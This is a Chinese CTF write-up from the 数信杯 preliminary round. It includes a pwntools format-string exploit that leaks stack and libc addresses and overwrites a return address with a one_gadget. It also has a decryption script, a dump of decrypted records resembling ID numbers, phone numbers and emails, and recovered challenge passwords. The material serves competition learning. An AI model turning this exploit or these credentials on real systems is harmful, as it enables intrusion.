题目描述:分析程序,获取对应附件中加密文件的原始数据,正确答案请提交解密后数据的第12行第2列数据
逆向题目
经过分析 是进行了一个base64加密和循环位移操作
写脚本解密
f = open("en_file_data.enf1","rb").read()def ror(x):return ((x<<5)| (x>>3)) & 0xff# f = [0xD2, 0x4B, 0x0A, 0x3B, 0x82, 0x9A, 0x12, 0xB3, 0x1B, 0x3A,# 0xB2, 0xAB, 0x5A, 0x1A, 0x52, 0x63, 0x13, 0x63, 0xC9, 0x6B,# 0x0B, 0xBA, 0xC3, 0x63, 0xC2, 0x91, 0x92, 0x43, 0x23, 0x3A,# 0x2A, 0xAB, 0xD2, 0xBA, 0xA9, 0x6B, 0x6A, 0x9A, 0x4A, 0x9B,# 0x4A, 0x73, 0x52, 0x4B, 0x4A, 0x4B, 0x5B, 0xAB, 0x1B, 0x6B,# 0xB2, 0x43, 0xD2, 0x1A, 0x3B, 0x83, 0x1A, 0x3B, 0xE9, 0xE9]data = [ror(i) for i in f]print(bytes(data))import base64print(base64.b64decode(bytes(data)).decode())
21314346626 826287201023279718 1[email protected]21125525201 87605419642117808X [email protected]36612076427 789192196526069239 [email protected]21211636726 875657197529189296 648d2d0@0d6f.com.cn26515876455 977163201721076923 49[email protected]25820865809 75898619592419812X 44[email protected]36721145807 949369199926057975 8[email protected]35829126483 766695195627077225 595720@6e60.com.cn35813325923 769655195224278366 4[email protected]36717295802 719155196725076234 [email protected]25615235523 709453196324167698 [email protected]26528925154 736463199528108971 [email protected]35823325991 897489197327197728 5[email protected]35619016658 856885196624098930 6[email protected]31217776671 755471198126258422 94620[email protected]35826886395 796692201430038016 8[email protected]31227686589 795781196730205842 [email protected]26822655306 929288201122126568 [email protected]31314776172 757157199023235618 [email protected]31219545152 968859196025075555 7[email protected]736463199528108971
存在格式化字符串漏洞 构造ROP 写gadget即可
from pwn import *
# r=process('./pb')
# r=remote('47.116.162.255',33135)
elf=ELF('./pb')
libc = ELF("./libc-2.23.so")
def pb(payload):
r.sendlineafter("How to do?",payload)
pb('%6$p,%11$p')
r.recv()
stack_addr = int(r.recv(14),16)
print("stack_addr------>",hex(stack_addr))
r.recv(1)
libc_base = int(r.recv(14),16) - 240 - libc.sym['__libc_start_main']
print("libc_base------->",hex(libc_base))
ogg = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + ogg[0]
vuln_stack1 = (stack_addr + 0x8) & 0xffff
pb('0')
payload = '%' + str(vuln_stack1) + 'c%13$hn'
pb(payload)
payload = '%' + str(one_gadget & 0xffff) + 'c%39$hn'
pb(payload)
payload = '%' + str(vuln_stack1+2) + 'c%13$hn'
pb(payload)
# gdb.attach(r)
payload = '%' + str((one_gadget>>16) & 0xff) + 'c%39$hhn'
print(hex(((one_gadget>>16) & 0xff)))
print(hex(one_gadget))
pb(payload)
r.interactive()
首先是一个Rc4加密
然后循环xor key = "276Y7JB6A1D4E2A2"
由于都是xor的操作 所以直接将密文作为输入传入 经过一轮加密后就自动解密了
ftp+admin+admin123 458e8dbe703531b99e3381853b3134ef
1-100png key.txt
101+key
717c0890a66bcf9524e87fdccb7d2bf4
在table_log中查每一条用户日志 提取出来 组 userid 方法 和 接口
制作一个接口反查API_id
(358, 358, '31.230.135.218 - - [ ] "GET /api/createApi HTTP/1.1" 200 6282'),
通过act获得每个日志的userid,访问方法,api,通过api表获得apiid,通过userid获得groupid,再根据groupid获得允许的方法和apiid,匹配日志中的是否在允许范围内,如果不在,则打印出来
代码太长 略
user=admin&password=admin%40QWEzxc
admin:admin@QWEzxc
95e1da8517497ee29e716a2835375eeb
搜索thekey 然后在损坏的TCP数据包列表中追踪
会发现最终的答案
$dbHost="localhost";
$dbName="webaweb";
$dbUser="webuser";
$dbPass="1q2w3e4r5t6y";
webuser:1q2w3e4r5t6y
a18b8e2d1a8ee267599b04be62f0a26a
广告
原文始发于微信公众号(影域实验室):记一次CTF的Writeup(WP)数信杯初赛 北区
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论